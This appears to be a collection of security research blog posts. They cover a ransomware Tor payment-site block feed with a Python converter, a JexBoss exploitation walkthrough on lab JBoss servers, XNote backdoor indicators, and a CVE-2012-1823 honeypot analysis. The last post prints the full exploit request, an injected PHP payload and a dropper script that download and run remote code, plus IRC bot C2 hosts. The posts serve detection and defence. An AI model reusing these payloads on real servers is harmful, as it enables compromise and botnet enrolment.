Using a spare RaspberryPi, we've started mapping out ransom ware domains. Our project operationalizes data from Harry71, Ahmia and VisiTOR. Their excellent work in mapping TOR makes this feed possible. Finally, as we stumble upon malware samples and perform analysis, the results of that analysis is fed into the tool.

After enumerating the .onion sites, we combine the data with known Web2Tor gateways that are commonly used by malware authors, and compile a suggested notification or block list.

Because our research is largely automated, there may be occasional legitimate .onion sites on the list. We do our very best to screen and remove these quickly.

Our goal is to combine this useful data into actionable indicators of warning for IT/IR teams to use in their IDS or SIEM. Ideally you would never see these observables in your environment; but if they hit it is important to act on them immediately.

For example, here is a snippet of a feed generated on December 25, 2016:

# Ransomware Payment Sites on TOR.
# List provided with no warranty by DeepEndResearch.
# Commercial use with permission only.
# There may be false positives in this list. It should be used as an Indicator of Warning list only.
# This file is updated daily.
qli26fihoid5qwo5.onion
qli26fihoid5qwo5.anonym.to
qli26fihoid5qwo5.hiddenservice.net
qli26fihoid5qwo5.onion.cab
qli26fihoid5qwo5.onion.nu
qli26fihoid5qwo5.onion.to
qli26fihoid5qwo5.s1.tor-gateways.de
qli26fihoid5qwo5.s2.tor-gateways.de
qli26fihoid5qwo5.s3.tor-gateways.de
qli26fihoid5qwo5.s4.tor-gateways.de
qli26fihoid5qwo5.s5.tor-gateways.de
qli26fihoid5qwo5.tor2web.fi
qli26fihoid5qwo5.onion?lang=de
qli26fihoid5qwo5.anonym.to
qli26fihoid5qwo5.hiddenservice.net
qli26fihoid5qwo5.onion.cab
qli26fihoid5qwo5.onion.nu
qli26fihoid5qwo5.onion.to
qli26fihoid5qwo5.s1.tor-gateways.de
qli26fihoid5qwo5.s2.tor-gateways.de
qli26fihoid5qwo5.s3.tor-gateways.de
qli26fihoid5qwo5.s4.tor-gateways.de
qli26fihoid5qwo5.s5.tor-gateways.de
qli26fihoid5qwo5.tor2web.fi

Our feed is updated daily and posted here:

https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt

We make several attempts to remove sites that are no longer operational within 24-48 hours.

One way you may try to operationalize this data, in a Splunk environment:
Convert the feed to a CSV file (set this as a daily Cron in your Splunk Search Head):

#!/usr/bin/python

import requests

if __name__ == '__main__':

ioc = []

feed_file = requests.get('https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt', verify=False).content

outfile = 'domain,notes\n'

for line in feed_file.splitlines():

if line.startswith('#') or '.' not in line:

continue

outfile += '%s,DeepEndResearch Suspected Ransomware Payment Site\n' % line

with open('ransomware_payment_site.csv', 'w') as fh:

fh.write(outfile)

Then set a query using the inputlookup option at a schedule that works for your environment.

We hope that you find this feed useful. Please feel free to comment or offer us suggestions!

Tuesday, April 12, 2016

JBoss exploits - View from a Victim

JBOSS

Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.

Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.

Exploits against JBoss are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.

For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "SamSam: The Doctor Will See You, After He Pays the Ransom"

Note that "JexBoss" is described as the exploit tool of choice. JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.

Via Shodan or Google 'dorking', one can determine that there are a great deal of JBoss deployments.

It can be safe to assume that many of these deployments likely remain vulnerable.

While healthcare and hospitals are the target 'du jour', other high profile industry segments running old JBoss, may be targeted next.

In an effort to raise awareness to the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.

We're providing some screen shots of JexBoss in action, along with the network packet captures from the vantage of the victim. We also will provide a list of the Snort and Emerging Threat IDS signatures that currently alert on this traffic.

Our test environment consisted of two Amazon EC2 instances running RedHat linux. I configured the first instance to run JBoss v6, and the other to run JBoss v4.

Please don't bother to test or "attack" the EC2 instances I used. They are firewalled to the world, except to my IP :)

The attacking environment was a simple Debian linux VM with JexBoss installed.

Attacking JBoss 4

Running JexBoss against a vulnerable host is quite trivial. You simply provide the URL of the JBoss instance, and hit Enter.

The following image shows how JexBoss found the JBoss web-console, jmx-console and JMXInvokerServlet as being vulnerable.

JexBoss attack against a JBoss v4 host

In this example, I ran the exploit against jmx-console. I then ran the linux 'ls' command to display the files on the compromised host.

Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "jbossass.war" from 'joaomatosf.com'.

Victim server fetching remote exploit toolkit

Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.

Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.

In this next example, I ran the exploit against the JBoss web-console.

Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice. Note how I used the 'curl' command to fetch a remote text file and display it on the console.

Using JexBoss to fetch a remote file via the compromised host.

In this example, I fetched the same file and saved it to the compromised host. Running the linux 'ls' command after the fetch reveals the file is now resident on the JBoss host.

Using JexBoss to fetch and save a remote file to the compromised host.

Here is a look at a log segment from the victim host after the exploits were run. A few exceptions are thrown, and Warnings and Info are logged.

Log file segment showing Warnings and Info after JexBoss exploit

Attacking JBoss v6

Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.

However, the jmx-console is as easily exploited as it was in JBoss version 4.

JexBoss exploit against the jmx-console on a JBoss v6 host

JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch

Summary:

By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.

With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it of critical urgency that any JBoss instance be checked and patched.

I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.

A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at CVEDetails - JBoss

We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim. We hope that this blog post helps raise further awareness to this serious threat, and provides some additional information to help detect and defend against these attacks.

Files and Additional Information:

IDS Signatures:

The following Snort and Emerging Threat IDS signatures will detect these JexBoss probes and exploits

[1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe

[1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass

[1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt

[1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt

[1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt

[1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt

Packet Captures

JexBoss attack traffic - Vantage of a JBoss version 6 host:

jexboss_attack_v6_victim_vantage.pcap

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):

jexboss_attack_v4a_victim_vantage.pcap

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):

jexboss_attack_v4b_victim_vantage.pcap

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):

jexboss_attack_v4c_victim_vantage.pcap

Monday, February 9, 2015

Linux.BackDoor.XNote.1 indicators

We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.
Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: http://blog.malwaremustdie.org/

Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host. The host is then used for a variety of functions, including as a DDoS bot.
The DrWeb posts provide a very good analysis of the malware and its overall structure.
http://news.drweb.com/show/?i=9272&lng=en&c=5
http://vms.drweb.com/virus/?i=4323517

We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.

Upon execution, we noted the sample contact a DNS server on 114.114.114.114 with queries for the following domains:

a.et2046.com
b.et2046.com
c.et2046.com

For each query, IP address 122.10.85.54 was returned for each of them.

In our run, the malicious 'xnote' process was noted to have process ID of 1303. Using 'volatility' to map information about the process memory, we noted:
Volatility Foundation Volatility Framework 2.4
Pid Start End Flags Pgoff Major Minor Inode Path
1303 0xc01000 0xc02000 r-x 0x0 8 1 405848 /home/mattyh/xnote
1303 0x8048000 0x81ba000 r-x 0x0 0 0 0
1303 0x81ba000 0x81c4000 rwx 0x0 0 0 0
1303 0xa137000 0xa158000 rwx 0x0 0 0 0 [heap]
1303 0xb78b6000 0xb78b7000 r-x 0x0 0 0 0 [vdso]
1303 0xbf843000 0xbf859000 rwx 0x0 0 0 0 [stack]

Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.

XXXXXXXXXXXXXXXX122.10.85.54
a.et2046.com
b.et2046.com
c.et2046.com
e.et2046.com
test
CAk[S
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
.,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF
-0123456789

-0123456789

Domain and IP Information:

It is interesting to note that the domain "et2046.com" has been seen before in other Linux ELF malware.

Note this post to an Ubuntu forum from May, 2014 where the subdomains 'kill.et2046.com' and 'sb.et2046.com' were noted in a running process on a compromised Ubuntu host.

Palo Alto Networks discusses these same domains in their post from July 16, 2014

Malware Must Die posted an analysis of the Linux iptablex malware where these domains were also seen:

Via VirusTotal searches, we find related malware to these domains:

https://www.virustotal.com/en/domain/sb.et2046.com/information/

https://www.virustotal.com/en/domain/kill.et2046.com/information/

Obtaining Passive DNS information from FarSight Security's DNSDB, we see that currently for IP address 122.10.85.54 the only DNS records are:

www.qtol.tv. A 122.10.85.54

Additional information from DNSDB for the domain et2046.com:

count 54

first seen in zone file 2014-11-12 17:13:42 -0000

last seen in zone file 2015-01-13 17:23:33 -0000

et2046.com. NS a.dnspod.com.

et2046.com. NS b.dnspod.com.

et2046.com. NS c.dnspod.com.

count 329

first seen in zone file 2013-12-17 17:13:33 -0000

last seen in zone file 2014-11-11 17:12:29 -0000

et2046.com. NS ns155.dnsever.com.

et2046.com. NS ns165.dnsever.com.

et2046.com. NS ns179.dnsever.com

Note that the malware uses a hardcoded DNS server on 114.114.114.114 to provide all domain resolution. This is a public DNS server based in China, with its web page at www.114dns.com

whois - 114.114.114.114

inetnum: 114.114.0.0 - 114.114.255.255

netname: XFInfo

descr: NanJing XinFeng Information Technologies, Inc.

descr: Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road

descr: Xuanwu District, Nanjing, Jiangsu, China

country: CN

irt: IRT-CNNIC-CN

address: Beijing, China

e-mail: ipas@cnnic.cn

abuse-mailbox: ipas@cnnic.cn

person: Yan Jian

nic-hdl: YJ1777-AP

e-mail: jyan@greatbit.com

person: Zhao Zhenping

nic-hdl: ZZ2094-AP

e-mail: ping@greatbit.com

whois- 122.10.85.54

inetnum: 122.10.80.0 - 122.10.95.255

netname: TOINTER-CN

descr: Royal Network Technology Co., Ltd. in Guangzhou

country: HK

admin-c: WX2631-AP

tech-c: WX2631-AP

status: ASSIGNED NON-PORTABLE

mnt-by: MAINT-CN-TOINTER122

mnt-irt: IRT-TOINTER-CN

changed: tengdayx@gmail.com 20150112

source: APNIC

irt: IRT-TOINTER-CN

address: Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360

e-mail: abuse@gzroyal.cn

abuse-mailbox: abuse@gzroyal.cn

admin-c: RNTC1-AP

tech-c: RNTC1-AP

auth: # Filtered

mnt-by: MAINT-TOINTER-CN

changed: hm-changed@apnic.net 20140919

source: APNIC

person: Wei XeiJun

address: Liwan District of Guangzhou, Guangdong Fangcun West 533

country: CN

phone: +86.1234567890

e-mail: tengdayx@qq.com

nic-hdl: WX2631-AP

mnt-by: MAINT-TOINTER-CN

changed: tengdayx@qq.com 20150111

'whois' for Domain et2046.com

Domain Name: ET2046.COM

Registry Domain ID: 1762221508_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.godaddy.com

Registrar URL: http://www.godaddy.com

Update Date: 2014-08-25T06:58:17Z

Creation Date: 2012-11-27T14:02:55Z

Registrar Registration Expiration Date: 2016-11-27T14:02:55Z

Registrar: GoDaddy.com, LLC

Registrar IANA ID: 146

Registrar Abuse Contact Email: abuse@godaddy.com

Registrar Abuse Contact Phone: +1.480-624-2505

Registry Registrant ID:

Registrant Name: smaina smaina

Registrant Organization:

Registrant Street: Beijing

Registrant City: Beijing

Registrant State/Province: Beijing

Registrant Postal Code: 100080

Registrant Country: China

Registrant Phone: +86.18622222222

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: tuhao550@gmail.com

-----------------------------------------------------------------------------------------------------------------------

Analysis Files

Malware - f374d1561e553a4c5b803e1d9d15a34e

(Uses same password scheme as Contagio. Ping me or Mila for details if needed)

Thursday, February 5, 2015

Library of Malware Traffic Patterns

Update February 2015
Use the new link below for a new interface and updates.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823. Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string. Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS. While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up. We like to study and track these variants and infrastructures, as well as the payloads that are being injected. In this case, one particular payload caught our eye.

In this case, the exploit attempt had URL encoding of:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1

Content-Length: 188

Content-Type: application/x-www-form-urlencoded

Host: -h

When decoded, the actual URL is :

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed"

#!/bin/bash

cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2". This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team". A copy of this popular IRCBot can be found at this PasteBin link.

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:

$server = 'antiq.scifi.ro'

$server = 'antiq.evils.in'

my @admins = ("AnTiQ","deathy","Vasy");

my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");

my @channels = ("#vnc");

The "seed' script also instructed our server to download "stats.php". This was also a tar file, which when expanded, created a hidden directory named ".d" which contained the following files:

Contents of hidden 'd' subdirectory

The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory

Section of "Slashing SirVic's"flooding source code.

Two other files included in the "stats.php" tarball were of particular interest. They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports. At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania. "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.

After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims. We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here: Link to "shiet.txt"

Soon after the script downloads, our server joined the IRC on antiq.scifi.ro (195.182.159.51)

Bot joining C2 on antiq.scifi.ro

Not long after that, a command initiating a flood attack against 70.39.96.225 begins, and the compromised host begins sending fragmented UDP packets to the victim.

Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood

We've observed this botnet as being very active, targeting a wide variety of victims. While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS, weak SSH passwords, as well as vulnerable PHP deployments remain a major weakspot in Internet facing servers. It's pretty safe to say that if web site administrators do not perform a regular, stringent patch management program, it's just a matter of 'when', not 'if' they will be compromised.